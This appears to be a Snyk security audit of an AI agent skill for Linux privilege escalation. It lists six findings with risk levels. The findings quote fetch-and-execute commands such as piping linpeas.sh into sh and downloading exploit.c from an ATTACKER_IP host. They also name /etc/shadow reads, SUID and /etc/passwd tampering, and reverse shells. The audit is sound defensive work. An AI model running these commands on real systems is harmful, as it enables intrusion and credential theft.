Linux Privilege Escalation

Fail

Audited by Snyk on Jul 28, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 0.90). The skill instructs reading sensitive files (e.g., /etc/shadow), embedding plaintext passwords in commands (openssl ... newpassword), and to produce command output/screenshot evidence that would require the agent to capture and potentially output secret values or substitute user-provided secrets/IPs verbatim into commands.

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 0.90). The GitHub and GTFOBins links point to known public tools/references, but the two http://ATTACKER_IP URLs are attacker-hosted direct script/source downloads (high-risk for malware distribution and unauthorized execution).

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The document contains explicit, actionable instructions to perform unauthorized privilege escalation, remote code execution, credential theft, persistence, and data exfiltration, indicating clear malicious intent and high risk of abuse.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.75). SKILL.md’s required workflow includes runtime fetching/execution of outsider-authored shell script content from public GitHub releases (e.g., curl ... linpeas.sh | sh and wget http://ATTACKER_IP/linpeas.sh), which would ingest arbitrary readable text into the agent context if the system captures/prints the fetched script output or content.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill fetches and executes remote code at runtime (curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh, wget http://ATTACKER_IP:8000/linpeas.sh then ./linpeas.sh, and wget http://ATTACKER_IP/exploit.c then gcc/exploit execution), so these URLs directly control executed code.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to perform privilege escalation (sudo exploitation, LD_PRELOAD, SUID creation, modifying /etc/passwd, writable cron/script edits, reverse shells and kernel exploits) that would modify system state and obtain root on the machine it runs on.

Issues (6)

W007
HIGH

Insecure credential handling detected in skill instructions.

E005
CRITICAL

Suspicious download URL detected in skill instructions.

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Jul 28, 2026, 05:45 AM
Issues
6
Security Audit — snyk — Linux Privilege Escalation